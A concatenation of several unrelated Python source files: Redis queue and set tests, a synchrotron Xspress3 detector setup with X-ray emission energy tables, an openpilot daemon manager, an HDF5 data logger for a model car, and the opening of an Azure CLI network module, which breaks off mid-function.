def test_sets(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.set import Set
with Set('test-set') as s:
s.delete()
values = ['a', 'b', 1, 2]
assert s.add(*values) == 4
assert s.length() == 4
for x in s.members():
assert x in values
assert s.random() in values
assert s.exist(values[2])
s.remove(values[2])
assert not s.exist(values[2])
pop_val = s.pop()
assert pop_val in values
assert not s.exist(pop_val)
assert s.length() == 2
assert s.limited_add('dog', 3)
assert not s.limited_add('cat', 3)
assert s.exist('dog')
assert not s.exist('cat')
assert s.length() == 3
# noinspection PyShadowingNames
def test_expiring_sets(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.set import ExpiringSet
with ExpiringSet('test-expiring-set', ttl=1) as es:
es.delete()
values = ['a', 'b', 1, 2]
assert es.add(*values) == 4
assert es.length() == 4
assert es.exist(values[2])
for x in es.members():
assert x in values
time.sleep(1.1)
assert es.length() == 0
assert not es.exist(values[2])
# noinspection PyShadowingNames
def test_lock(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.lock import Lock
def locked_execution(next_thread=None):
with Lock('test', 10):
if next_thread:
next_thread.start()
time.sleep(2)
t2 = Thread(target=locked_execution)
t1 = Thread(target=locked_execution, args=(t2,))
t1.start()
time.sleep(1)
assert t1.is_alive()
assert t2.is_alive()
time.sleep(2)
assert not t1.is_alive()
assert t2.is_alive()
time.sleep(2)
assert not t1.is_alive()
assert not t2.is_alive()
# noinspection PyShadowingNames,PyUnusedLocal
def test_priority_queue(redis_connection):
from assemblyline.remote.datatypes.queues.priority import PriorityQueue
with PriorityQueue('test-priority-queue') as pq:
pq.delete()
for x in range(10):
pq.push(100, x)
pq.push(101, 'a')
pq.push(99, 'z')
assert pq.pop() == 'a'
assert pq.unpush() == 'z'
assert pq.count(100, 100) == 10
assert pq.pop() == 0
assert pq.unpush() == 9
assert pq.length() == 8
assert pq.pop(4) == [1, 2, 3, 4]
assert pq.unpush(3) == [6, 7, 8]
assert pq.length() == 1 # Should be [<100, 5>] at this point
for x in range(5):
pq.push(100 + x, x)
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=106) == []
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=103) == [4] # 3 and 4 are both options, 4 has higher score
assert pq.dequeue_range(lower_limit=102, skip=1) == [2] # 2 and 3 are both options, 3 has higher score, skip it
assert pq.dequeue_range(upper_limit=100, num=10) == [5, 0] # Take some off the other end
assert pq.length() == 2
pq.pop(2)
pq.push(50, 'first')
pq.push(-50, 'second')
assert pq.dequeue_range(0, 100) == ['first']
assert pq.dequeue_range(-100, 0) == ['second']
# noinspection PyShadowingNames,PyUnusedLocal
def test_unique_priority_queue(redis_connection):
from assemblyline.remote.datatypes.queues.priority import UniquePriorityQueue
with UniquePriorityQueue('test-priority-queue') as pq:
pq.delete()
for x in range(10):
pq.push(100, x)
assert pq.length() == 10
# Values should be unique, this should have no effect on the length
for x in range(10):
pq.push(100, x)
assert pq.length() == 10
pq.push(101, 'a')
pq.push(99, 'z')
assert pq.pop() == 'a'
assert pq.unpush() == 'z'
assert pq.count(100, 100) == 10
assert pq.pop() == 0
assert pq.unpush() == 9
assert pq.length() == 8
assert pq.pop(4) == [1, 2, 3, 4]
assert pq.unpush(3) == [6, 7, 8]
assert pq.length() == 1 # Should be [<100, 5>] at this point
for x in range(5):
pq.push(100 + x, x)
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=106) == []
assert pq.length() == 6
assert pq.dequeue_range(lower_limit=103) == [4] # 3 and 4 are both options, 4 has higher score
assert pq.dequeue_range(lower_limit=102, skip=1) == [2] # 2 and 3 are both options, 3 has higher score, skip it
assert sorted(pq.dequeue_range(upper_limit=100, num=10)) == [0, 5] # Take some off the other end
assert pq.length() == 2
pq.pop(2)
pq.push(50, 'first')
pq.push(-50, 'second')
assert pq.dequeue_range(0, 100) == ['first']
assert pq.dequeue_range(-100, 0) == ['second']
# noinspection PyShadowingNames
def test_named_queue(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.queues.named import NamedQueue, select
with NamedQueue('test-named-queue') as nq:
nq.delete()
for x in range(5):
nq.push(x)
assert nq.length() == 5
nq.push(*list(range(5)))
assert nq.length() == 10
assert nq.peek_next() == nq.pop()
assert nq.peek_next() == 1
v = nq.pop()
assert v == 1
assert nq.peek_next() == 2
nq.unpop(v)
assert nq.peek_next() == 1
assert select(nq) == ('test-named-queue', 1)
with NamedQueue('test-named-queue-1') as nq1:
nq1.delete()
with NamedQueue('test-named-queue-2') as nq2:
nq2.delete()
nq1.push(1)
nq2.push(2)
assert select(nq1, nq2) == ('test-named-queue-1', 1)
assert select(nq1, nq2) == ('test-named-queue-2', 2)
# noinspection PyShadowingNames
def test_multi_queue(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.queues.multi import MultiQueue
mq = MultiQueue()
mq.delete('test-multi-q1')
mq.delete('test-multi-q2')
for x in range(5):
mq.push('test-multi-q1', x+1)
mq.push('test-multi-q2', x+6)
assert mq.length('test-multi-q1') == 5
assert mq.length('test-multi-q2') == 5
assert mq.pop('test-multi-q1') == 1
assert mq.pop('test-multi-q2') == 6
assert mq.length('test-multi-q1') == 4
assert mq.length('test-multi-q2') == 4
mq.delete('test-multi-q1')
mq.delete('test-multi-q2')
assert mq.length('test-multi-q1') == 0
assert mq.length('test-multi-q2') == 0
# noinspection PyShadowingNames
def test_comms_queue(redis_connection):
if redis_connection:
from assemblyline.remote.datatypes.queues.comms import CommsQueue
def publish_messages(message_list):
time.sleep(0.1)
with CommsQueue('test-comms-queue') as cq_p:
for message in message_list:
cq_p.publish(message)
msg_list = ["bob", 1, {"bob": 1}, [1, 2, 3], None, "Nice!", "stop"]
t = Thread(target=publish_messages, args=(msg_list,))
t.start()
with CommsQueue('test-comms-queue') as cq:
x = 0
for msg in cq.listen():
if msg == "stop":
break
assert msg == msg_list[x]
x += 1
t.join()
assert not t.is_alive()
|
21-xspress3.py
|
from ophyd.device import (Component as Cpt)
from hxntools.detectors.xspress3 import (Xspress3FileStore,
Xspress3Channel)
from hxntools.detectors.hxn_xspress3 import HxnXspress3DetectorBase
import threading
from ophyd import DeviceStatus
class HxnXspress3Detector(HxnXspress3DetectorBase):
channel1 = Cpt(Xspress3Channel, 'C1_', channel_num=1)
channel2 = Cpt(Xspress3Channel, 'C2_', channel_num=2)
channel3 = Cpt(Xspress3Channel, 'C3_', channel_num=3)
# Currently only using three channels. Uncomment these to enable more
# channels:
# channel4 = C(Xspress3Channel, 'C4_', channel_num=4)
# channel5 = C(Xspress3Channel, 'C5_', channel_num=5)
# channel6 = C(Xspress3Channel, 'C6_', channel_num=6)
# channel7 = C(Xspress3Channel, 'C7_', channel_num=7)
# channel8 = C(Xspress3Channel, 'C8_', channel_num=8)
hdf5 = Cpt(Xspress3FileStore, 'HDF5:',
write_path_template='/data/%Y/%m/%d/',
mds_key_format='xspress3_ch{chan}',
reg=db.reg,
root='/data',
)
def __init__(self, prefix, *, configuration_attrs=None, read_attrs=None,
**kwargs):
if configuration_attrs is None:
configuration_attrs = ['external_trig', 'total_points',
'spectra_per_point']
if read_attrs is None:
read_attrs = ['channel1', 'channel2', 'channel3', 'hdf5']
super().__init__(prefix, configuration_attrs=configuration_attrs,
read_attrs=read_attrs, **kwargs)
self._dispatch_cid = None
self._spec_saved = threading.Event()
def stage(self, *args, **kwargs):
for j in itertools.count():
try:
ret = super().stage(*args, **kwargs)
except TimeoutError:
N_try = 20
if j < 20:
print(f"failed to stage on try{j}/{N_try}, may try again")
continue
else:
raise
else:
break
# clear any existing callback
if self._dispatch_cid is not None:
self.hdf5.num_captured.clear_sub(self._dispatch_cid)
self._dispatch_cid = None
# always install the callback
def _handle_spectrum_capture(old_value, value, timestamp, **kwargs):
# if we get called and we are in fly mode, rip self off and bail
# the flyscan takes care of this its self, but does not tell us we are in fly
# mode until after we are staged
if self.mode_settings.scan_type.get() != 'step':
if self._dispatch_cid is not None:
self.hdf5.num_captured.clear_sub(self._dispatch_cid)
self._dispatch_cid = None
return
# grab the time and the previous value from the callback payload
trigger_time = timestamp
self._abs_trigger_count = old_value
# dispatch for all of the channels
for sn in self.read_attrs:
if sn.startswith('channel') and '.' not in sn:
ch = getattr(self, sn)
self.dispatch(ch.name, trigger_time)
#print(ch.name, trigger_time, self._abs_trigger_count)
self._abs_trigger_count = value
self._spec_saved.set()
# do the actual subscribe
self._dispatch_cid = self.hdf5.num_captured.subscribe(
_handle_spectrum_capture,
run=False)
return ret
def trigger(self):
self.sts = sts = DeviceStatus(self)
# in the not step case, just return a done status object
if self.mode_settings.scan_type.get() != 'step':
sts._finished()
return sts
self._spec_saved.clear()
def monitor():
success = self._spec_saved.wait(60)
sts._finished(success=success)
# hold a ref for gc reasons
self._th = threading.Thread(target=monitor)
self._th.start()
return sts
def unstage(self, *args, **kwargs):
try:
if self._dispatch_cid is not None:
self.hdf5.num_captured.clear_sub(self._dispatch_cid)
self._dispatch_cid = None
finally:
import itertools
for j in itertools.count():
try:
ret = super().unstage(*args, **kwargs)
except TimeoutError:
N_try = 20
if j < N_try:
print(f"failed to unstage on attempt {j}/{N_try}, may try again")
continue
else:
raise
else:
break
return ret
xspress3 = HxnXspress3Detector('XF:03IDC-ES{Xsp:1}:', name='xspress3')
# Create directories on the xspress3 server, otherwise scans can fail:
xspress3.make_directories.put(True)
elem_K_list = np.array(['Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca','Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn','Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr','Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn','Sb','Te','I','Xe','Cs','Ba','La','Hf','Ta','W','Re','Os','Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn','Fr','Ra','Ac','Ce','Pr','Nd','Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb','Lu','Th','Pa','U','Np','Pu','Am','Cm','Bk','Cf'])
energy_K_list = np.array([1040,1254,1487,1740,2011,2310,2622,2958,3314,3692,4093,4512,4953,5415,5900,6405,6931,7480,8046,8637,9251,9886,10543,11224,11924,12648,13396,14165,14958,15775,16615,17480,18367,19279,20216,21177,22163,23173,24210,25271,26359,27473,28612,29775,30973,32194,33442,55790,57535,59318,61141,63000,64896,66831,68806,70818,72872,74970,77107,79291,81516,83785,86106,88478,90884,34720,36027,37361,38725,40118,41542,42996,44482,45999,47547,49128,50742,52388,54070,93351,95868,98440,101059,103734,106472,109271,112121,115032])
elem_L_list = np.array(['Zn_L','Ga_L','Ge_L','AS_L','Se_L','Br_L','Kr_L','Rb_L','Sr_L','Y_L','Zr_L','Nb_L','Mo_L','Tc_L','Ru_L','Rh_L','Pd_L','Ag_L','Cd_L','In_L','Sn_L','Sb_L','Te_L','I_L','Xe_L','Cs_L','Ba_L','La_L','Hf_L','Ta_L','W_L','Re_L','Os_L','Ir_L','Pt_L','Au_L','Hg_L','Tl_L','Pb_L','Bi_L','Po_L','At_L','Rn_L','Fr_L','Ra_L','Ac_L','Ce_L','Pr_L','Nd_L','Pm_L','Sm_L','Eu_L','Gd_L','Tb_L','Dy_L','Ho_L','Er_L','Tm_L','Yb_L','Lu_L','Th_L','Pa_L','U_L','Np_L','Pu_L','Am_L','Cm_L','Bk_L','Cf_L'])
energy_L_list = np.array([1012,1098,1186,1282,1379,1481,1585,1692,1806,1924,2044,2169,2292,2423,2558,2697,2838,2983,3133,3280,3444,3604,3768,3938,4110,4285,4467,4647,7899,8146,8398,8652,8911,9175,9442,9713,9989,10269,10551,10839,11131,11427,11727,12031,12339,12652,4839,5035,5228,5432,5633,5850,6053,6273,6498,6720,6949,7180,7416,7655,12968,13291,13614,13946,14282,14620,14961,15308,15660])
elem_M_list = np.array(['Hf_M','Ta_M','W_M','Re_M','Os_M','Ir_M','Pt_M','Au_M','Hg_M','Tl_M','Pb_M','Bi_M','Po_M','At_M','Rn_M','Fr_M','Ra_M','Ac_M','Ce_M','Pr_M','Nd_M','Pm_M','Sm_M','Eu_M','Gd_M','Tb_M','Dy_M','Ho_M','Er_M','Tm_M','Yb_M','Lu_M','Th_M','Pa_M','U_M','Np_M','Pu_M','Am_M','Cm_M','Bk_M','Cf_M'])
energy_M_list = np.array([1646,1712,1775,1840,1907,1976,2048,2118,2191,2267,2342,2418,2499,2577,2654,2732,2806,2900,884,927,979,1023,1078,1122,1181,1233,1284,1342,1404,1463,1526,1580,2990,3071,3164,3250,3339,3429,3525,3616,3709])
def xspress3_roi_setup():
elem_list = np.array(['Cu','Si','Mo_L','P','Os_M','P','Pt_M','Mg','Fe','Cr','Sr_L','Pd_L','Ni','Au_M', 'Mn', 'S'])
num_elem = np.size(elem_list)
if num_elem > 16:
num_elem = 16
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
for i in range(num_elem):
if elem_list[i] in elem_K_list:
energy = energy_K_list[elem_K_list == elem_list[i]]
elif elem_list[i] in elem_L_list:
energy = energy_L_list[elem_L_list == elem_list[i]]
elif elem_list[i] in elem_M_list:
energy = energy_M_list[elem_M_list == elem_list[i]]
else:
print(elem_list[i], 'is not defined.')
break
channel.set_roi(i+1, energy-150, energy+150, name=elem_list[i])
'''
def xspress3_roi_setup():
for channel in [xspress3.channel1, xspress3.channel2, xspress3.channel3]:
#channel.set_roi(1, 9300, 9600, name='Pt')
channel.set_roi(1, 1590, 1890, name='Si')
#channel.set_roi(2, 1898, 2198, name='Pt_M')
#channel.set_roi(2, 2150, 2450, name='S')
#channel.set_roi(2, 14000, 14300, name='Sr')
#channel.set_roi(2, 3790, 4090, name='I')
#channel.set_roi(2, 3850, 4140, name='Bi_M')
#channel.set_roi(2, 3300, 3600, name='Sn')
channel.set_roi(4, 8250, 8550, name='W')
channel.set_roi(2, 4690, 4990, name='Ce')
#channel.set_roi(3, 4150, 4450, name='Cs')
#channel.set_roi(2, 2019, 2319, name='Nb')
#channel.set_roi(3, 5700, 6000, name='Eu')
channel.set_roi(3, 4360, 4660, name='Ti')
#channel.set_roi(3, 6800, 7100, name='Er')
#channel.set_roi(5, 4250, 4550, name='Ba')
channel.set_roi(5, 4150, 4450, name='Cs')
#channel.set_roi(3, 1970, 2270, name='Au_M')
#channel.set_roi(4, 5750, 6050, name='Mn')
#channel.set_roi(5, 2472, 2772, name='Cl')
#channel.set_roi(5, 2200, 2500, name='Pb_M')
#channel.set_roi(5, 2810, 3110, name='Ag')
#channel.set_roi(5, 6780, 7080, name='Co')
channel.set_roi(6, 3542, 3842, name='Ca')
channel.set_roi(7, 3130, 3430, name='In')
channel.set_roi(8, 5900, 6200, name='Gd')
channel.set_roi(9, 5078, 5378, name='Nd')
#channel.set_roi(9, 4800, 5100, name='V')
#channel.set_roi(7, 1850, 2150, name='P')
#channel.set_roi(8, 3000, 3300, name='Cd')
channel.set_roi(10, 5270, 5570, name='Cr')
#channel.set_roi(9, 3160, 3460, name='K')
#channel.set_roi(10, 10400, 10700, name='Pb')
#channel.set_roi(10, 3600, 3900, name='Te')
#channel.set_roi(11, 9550, 9850, name='Au')
channel.set_roi(11, 6250, 6550, name='Fe')
channel.set_roi(12, 11050, 11350, name='Se')
#channel.set_roi(13, 8487, 8787, name='Zn')
channel.set_roi(13, 8000, 8300, name='Ta')
channel.set_roi(14, 7330, 7630, name='Ni')
#channel.set_roi(15, 7950, 8150, name='Cu')
channel.set_roi(15, 9300, 9600, name='Pt')
#channel.set_roi(16, 11775, 12075, name='Br')
#channel.set_roi(16, 9736, 10036, name='Ge')
# channel.set_roi(17, 8250, 8550, 'W')
# channel.set_roi(18, 9600, 9750, 'Au')
# channel.set_roi(19, 11500, 12500, 'EL')
# channel.set_roi(20, 1900, 2000, 'Y')
# channel.set_roi(15, 1340, 1640, name='Al')
# channel.set_roi(22, 4360, 4660, 'Ti')
# channel.set_roi(23, 4550, 4750, 'La')
channel.set_roi(16, 9150, 9350, name='Ga')
'''
try:
print('Configuring Xspress3 ROIs...')
xspress3_roi_setup()
print('Done')
except KeyboardInterrupt:
print('Xspress3 ROI configuration cancelled.')
def hint_xspress_element(elm):
elm = elm.upper()
xspress3.hints['fields'] = [f'Det{j}_{elm}' for j in (1, 2, 3)]
def configure_xspress3(sclr):
sclr.configuration_attrs = sclr.component_names
sclr.flyer_timestamps.kind = 'omitted'
sclr.roi_data.kind = 'omitted'
sclr.make_directories.kind = 'omitted'
sclr.rewindable.kind = 'omitted'
for k, chan in sclr.channels.items():
chan.configuration_names.kind = 'config'
chan.vis_enabled.kind = 'omitted'
chan.rois.kind = 'normal'
chan.rois.num_rois.kind = 'config'
chan.name = chan.name.replace('annel', '')
for n in chan.rois.component_names:
if 'roi' in n and n != 'num_rois':
roi = getattr(chan.rois, n)
roi.kind = 'normal'
roi.value.kind = 'normal'
roi.value_sum.kind = 'omitted'
else:
attr = getattr(chan.rois, n)
attr.kind = 'config'
configure_xspress3(xspress3)
|
manage_athenad.py
|
#!/usr/bin/env python3
import time
from multiprocessing import Process
from common.params import Params
from selfdrive.manager.process import launcher
from system.swaglog import cloudlog
from system.version import get_version, is_dirty
ATHENA_MGR_PID_PARAM = "AthenadPid"
def main():
params = Params()
dongle_id = params.get("DongleId").decode('utf-8')
cloudlog.bind_global(dongle_id=dongle_id, version=get_version(), dirty=is_dirty())
try:
while 1:
cloudlog.info("starting athena daemon")
proc = Process(name='athenad', target=launcher, args=('selfdrive.athena.athenad', 'athenad'))
proc.start()
proc.join()
cloudlog.event("athenad exited", exitcode=proc.exitcode)
time.sleep(5)
except Exception:
cloudlog.exception("manage_athenad.exception")
finally:
params.delete(ATHENA_MGR_PID_PARAM)
if __name__ == '__main__':
main()
|
write_hdf5.py
|
import threading
import queue
import h5py
import time
import os
from .folder_functions import UserPath
class StreamToHDF5(UserPath):
def __init__(self,
image_width: int,
image_height: int,
steering_max: int,
steering_min: int,
throttle_neutral: int,
throttle_max: int,
throttle_min: int,
file_version_number: int=1.0,
f_name_suffix: str= '_'):
"""
This class stream to disk "frames" (i.e., groups) of data sets using a queue.
Parameters
----------
image_width: (int) image width
image_height: (int) image height
steering_max: (int) steering max value
steering_min: (int) steering min value
throttle_neutral: (int) neutral throttle value
throttle_max: (int) maximum throttle value
throttle_min: (int) minimum throttle value
file_version_number: (float) version of the file format
f_name_suffix: (str) suffix of file name
"""
UserPath.__init__(self, 'miniCar.py')
# Make sure to have a valid value
self.select_user_data_folder('', 'validate')
# Set image dimensions for class usage
self.image_width = image_width
self.image_height = image_height
# Set the current file version
self.fileVersionNum = file_version_number
# Suffix added at the end of the file name
self.fNameSuffix = f_name_suffix
# Set the steering attributes
self.steerMax = steering_max
self.steerMin = steering_min
# Set the throttle attributes
self.throttle_neutral = throttle_neutral
self.throttle_max = throttle_max
self.throttle_min = throttle_min
# Set a lock for control of write function
self.lock = threading.Lock()
# Log file
self.log_file = None
# Do we have a thread actively running
self.thread_running = False
# Frame indexing within queue
self.frame_index = 0
# Create a queue for storing images and driver input
self.log_queue = queue.Queue()
def initiate_stream(self):
"""
Initiate a thread to stream data to a file.
"""
# Create a thread to do actual writing
self.thread_write = threading.Thread(name='WriteHDF5',
target=self.write_queue_threading, args=( ))
self.thread_write.setDaemon(True)
self.thread_write.start()
self.thread_running = True
def write_queue_threading(self):
"""
Threaded method that de-queue data and saves it to disk.
"""
# Acquire a lock
self.lock.acquire()
print('We are about to start the threading!')
# @TODO: Let's keep an eye on this threading stuff: might not work on Jetson
try:
while self.thread_running:
# Get the current data frame from the queue
log_data = self.log_queue.get()
# Each frame of data is a separate group
current_frame = str(log_data[0]).zfill(6)
# Save every 20000 frames to a separate file
if not (log_data[0]%20000) == 0:
self.write_data(current_frame, log_data)
# Create a new file
else:
self.create_new_file()
# Write the first frame of the new log file
self.write_data(current_frame, log_data)
finally:
# Release the lock
self.lock.release()
print('Thread lock released.')
def create_new_file(self):
"""
Method that creates a new HDF5 logging file where miniCar
data and saved to disk.
"""
# Create name string for log file
date = time.strftime('%y%m%d')
clock = time.strftime('%H%M%S')
descriptor = '_miniCar'
file_path = os.path.join(self.user_data_folder, date + '_' + clock + descriptor + \
self.fNameSuffix + '.hdf5')
# Open up an HDF5 to store data
self.log_file = h5py.File(file_path, 'w')
# Set storage attributes
if self.fileVersionNum == 1.0:
# This version is for miniCar
self.log_file.attrs['fileVersion'] = 'miniCarDataV1.0'
elif self.fileVersionNum == 1.1:
# This version is for miniCar
self.log_file.attrs['fileVersion'] = 'miniCarDataV1.1'
else:
raise ValueError('Unknown HDF5 file version? ',
'method: create_new_file',
'class: streamToDiskHDF5')
self.log_file.attrs['imgHeight'] = str(self.image_height)
self.log_file.attrs['imgWidth'] = str(self.image_width)
self.log_file.attrs['steerMax'] = str(self.steerMax)
self.log_file.attrs['steerMin'] = str(self.steerMin)
self.log_file.attrs['throttleMax'] = str(self.throttle_max)
self.log_file.attrs['throttleMin'] = str(self.throttle_min)
self.log_file.attrs['throttleNeutral'] = str(self.throttle_neutral)
def write_data(self, current_frame: int, log_data: list):
"""
Method that writes the de-queued "frame" data to an HDF5
group in the file.
Parameters
----------
current_frame: (int) frame number that is being written
log_data: (list) array of data being written to given group
"""
frame_name = 'frame_'+ str(current_frame)
self.log_file.create_group(frame_name)
# Within each frame/group, each entry is it's own dataset
self.log_file.create_dataset(frame_name+'/frame', data=log_data[0])
self.log_file.create_dataset(frame_name+'/loop_frame_rate', data=log_data[1])
self.log_file.create_dataset(frame_name+'/steering', data=log_data[2])
self.log_file.create_dataset(frame_name+'/throttle', data=log_data[3])
self.log_file.create_dataset(frame_name+'/image', data=log_data[4])
def close_log_file(self):
"""
Method that stops the threading and close the file.
"""
self.thread_running = False
self.log_file.close()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from collections import Counter, OrderedDict
from msrestazure.tools import parse_resource_id, is_valid_resource_id, resource_id
from knack.log import get_logger
from azure.mgmt.trafficmanager.models import MonitorProtocol, ProfileStatus
# pylint: disable=no-self-use,no-member,too-many-lines,unused-argument
from azure.cli.core.commands import cached_get, cached_put, upsert_to_collection, get_property
from azure.cli.core.commands.client_factory import get_subscription_id, get_mgmt_service_client
from azure.cli.core.util import CLIError, sdk_no_wait, find_child_item, find_child_collection
from azure.cli.core.azclierror import InvalidArgumentValueError, RequiredArgumentMissingError, \
UnrecognizedArgumentError, ResourceNotFoundError, CLIInternalError, ArgumentUsageError
from azure.cli.core.profiles import ResourceType, supported_api_version
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.command_modules.network.zone_file.parse_zone_file import parse_zone_file
from azure.cli.command_modules.network.zone_file.make_zone_file import make_zone_file
import threading
import time
import platform
import subprocess
import tempfile
logger = get_logger(__name__)
# region Utility methods
def _log_pprint_template(template):
import json
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
def _get_default_name(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, True)
def _get_default_id(balancer, property_name, option_name):
return _get_default_value(balancer, property_name, option_name, False)
def _get_default_value(balancer, property_name, option_name, return_name):
values = [x.id for x in getattr(balancer, property_name)]
if len(values) > 1:
raise CLIError("Multiple possible values found for '{0}': {1}\nSpecify '{0}' "
"explicitly.".format(option_name, ', '.join(values)))
if not values:
raise CLIError("No existing values found for '{0}'. Create one first and try "
"again.".format(option_name))
return values[0].rsplit('/', 1)[1] if return_name else values[0]
# endregion
# region Generic list commands
def _generic_list(cli_ctx, operation_name, resource_group_name):
ncf = network_client_factory(cli_ctx)
operation_group = getattr(ncf, operation_name)
if resource_group_name:
return operation_group.list(resource_group_name)
return operation_group.list_all()
def list_vnet(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'virtual_networks', resource_group_name)
def list_express_route_circuits(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'express_route_circuits', resource_group_name)
def create_express_route_auth(cmd, resource_group_name, circuit_name, authorization_name):
ExpressRouteCircuitAuthorization = cmd.get_models('ExpressRouteCircuitAuthorization')
client = network_client_factory(cmd.cli_ctx).express_route_circuit_authorizations
return client.begin_create_or_update(resource_group_name,
circuit_name,
authorization_name,
ExpressRouteCircuitAuthorization())
def list_lbs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'load_balancers', resource_group_name)
def list_nics(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_interfaces', resource_group_name)
def list_nsgs(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_security_groups', resource_group_name)
def list_nsg_rules(cmd, resource_group_name, network_security_group_name, include_default=False):
client = network_client_factory(cmd.cli_ctx).network_security_groups
nsg = client.get(resource_group_name, network_security_group_name)
rules = nsg.security_rules
if include_default:
rules = rules + nsg.default_security_rules
return rules
def list_custom_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'custom_ip_prefixes', resource_group_name)
def list_public_ips(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_addresses', resource_group_name)
def list_public_ip_prefixes(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'public_ip_prefixes', resource_group_name)
def list_route_tables(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'route_tables', resource_group_name)
def list_application_gateways(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'application_gateways', resource_group_name)
def list_network_watchers(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'network_watchers', resource_group_name)
# endregion
# region ApplicationGateways
# pylint: disable=too-many-locals
def _is_v2_sku(sku):
return 'v2' in sku
# pylint: disable=too-many-statements
def create_application_gateway(cmd, application_gateway_name, resource_group_name, location=None,
tags=None, no_wait=False, capacity=2,
cert_data=None, cert_password=None, key_vault_secret_id=None,
frontend_port=None, http_settings_cookie_based_affinity='disabled',
http_settings_port=80, http_settings_protocol='Http',
routing_rule_type='Basic', servers=None,
sku=None,
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
subnet='default', subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
connection_draining_timeout=0, enable_http2=None, min_capacity=None, zones=None,
custom_error_pages=None, firewall_policy=None, max_capacity=None,
user_assigned_identity=None,
enable_private_link=False,
private_link_ip_address=None,
private_link_subnet='PrivateLinkDefaultSubnet',
private_link_subnet_prefix='10.0.1.0/24',
private_link_primary=None,
trusted_client_cert=None,
ssl_profile=None,
ssl_profile_id=None,
ssl_cert_name=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_application_gateway_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
sku_tier = sku.split('_', 1)[0] if not _is_v2_sku(sku) else sku
http_listener_protocol = 'https' if (cert_data or key_vault_secret_id) else 'http'
private_ip_allocation = 'Static' if private_ip_address else 'Dynamic'
virtual_network_name = virtual_network_name or '{}Vnet'.format(application_gateway_name)
# Build up the ARM template
master_template = ArmTemplateBuilder()
ag_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if subnet_type == 'new':
ag_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix,
enable_private_link=enable_private_link,
private_link_subnet=private_link_subnet,
private_link_subnet_prefix=private_link_subnet_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name, subnet)
if public_ip_address_type == 'new':
ag_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
public_ip_sku = None
if _is_v2_sku(sku):
public_ip_sku = 'Standard'
public_ip_address_allocation = 'Static'
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
None, public_ip_sku, None))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
private_link_subnet_id = None
private_link_name = 'PrivateLinkDefaultConfiguration'
private_link_ip_allocation_method = 'Dynamic'
if enable_private_link:
private_link_subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(network_id_template,
virtual_network_name,
private_link_subnet)
private_link_ip_allocation_method = IPAllocationMethod.static.value if private_link_ip_address \
else IPAllocationMethod.dynamic.value
app_gateway_resource = build_application_gateway_resource(
cmd, application_gateway_name, location, tags, sku, sku_tier, capacity, servers, frontend_port,
private_ip_address, private_ip_allocation, cert_data, cert_password, key_vault_secret_id,
http_settings_cookie_based_affinity, http_settings_protocol, http_settings_port,
http_listener_protocol, routing_rule_type, public_ip_id, subnet_id,
connection_draining_timeout, enable_http2, min_capacity, zones, custom_error_pages,
firewall_policy, max_capacity, user_assigned_identity,
enable_private_link, private_link_name,
private_link_ip_address, private_link_ip_allocation_method, private_link_primary,
private_link_subnet_id, trusted_client_cert, ssl_profile, ssl_profile_id, ssl_cert_name)
app_gateway_resource['dependsOn'] = ag_dependencies
master_template.add_variable(
'appGwID',
